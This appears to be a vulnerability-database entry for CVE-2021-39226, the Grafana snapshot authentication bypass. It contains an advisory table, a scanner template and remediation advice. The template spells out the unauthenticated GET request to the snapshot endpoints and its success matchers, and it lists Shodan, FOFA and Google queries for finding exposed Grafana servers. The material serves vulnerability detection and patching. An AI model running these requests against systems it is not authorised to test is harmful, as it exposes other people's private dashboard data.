| Reporter | Title | Published | Views | Family All 119 |
|---|---|---|---|---|
| Grafana -- Snapshot authentication bypass | 15 Sep 202100:00 | – | freebsd | |
| CVE-2021-38406 | 9 Sep 202100:00 | – | attackerkb | |
| CVE-2021-39226 | 5 Oct 202100:00 | – | attackerkb | |
| Alibaba Cloud Linux 3 : 0073: grafana (ALINUX3-SA-2021:0073) | 14 May 202500:00 | – | nessus | |
| CentOS 8 : grafana (CESA-2021:3771) | 15 Oct 202100:00 | – | nessus | |
| CentOS 9 : grafana-9.0.9-1.el9 | 29 Feb 202400:00 | – | nessus | |
| FreeBSD : Grafana -- Snapshot authentication bypass (757ee63b-269a-11ec-a616-6c3be5272acd) | 28 Oct 202100:00 | – | nessus | |
| MiracleLinux 8 : grafana-7.3.6-3.el8 (AXSA:2021-2462:05) | 20 Jan 202600:00 | – | nessus | |
| openSUSE 15 Security Update : grafana (openSUSE-SU-2022:0140-1) | 21 Jan 202200:00 | – | nessus | |
| Oracle Linux 8 : grafana (ELSA-2021-3771) | 13 Oct 202100:00 | – | nessus |
id: CVE-2021-39226
info:
name: Grafana Snapshot - Authentication Bypass
author: Evan Rubinstein,matejsmycka
severity: high
description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
impact: |
An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature.
remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.'
reference:
- https://github.com/advisories/GHSA-69j6-29vr-p3j9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39226
- https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269
- https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/
- http://www.openwall.com/lists/oss-security/2021/10/05/4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2021-39226
cwe-id: CWE-287
epss-score: 0.99888
epss-percentile: 0.99963
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: grafana
product: grafana
shodan-query:
- title:"Grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
- http.title:"grafana"
fofa-query:
- title="grafana"
- app="grafana"
google-query: intitle:"grafana"
tags: cve2021,cve,grafana,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/snapshots/:key"
- "{{BaseURL}}/dashboard/snapshot/:key"
matchers-condition: and
matchers:
- type: word
words:
- '"isSnapshot":true'
- type: status
status:
- 200
# digest: 4a0a004730450221009574cc2c409bdac94d99b58408fc8254de1bd77c0e2393c1b5f1b2e82f70b117022018661f283c08bf43fe3dac77abfd34d787c89dc3b74ac83bf51e791b1e049a2a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation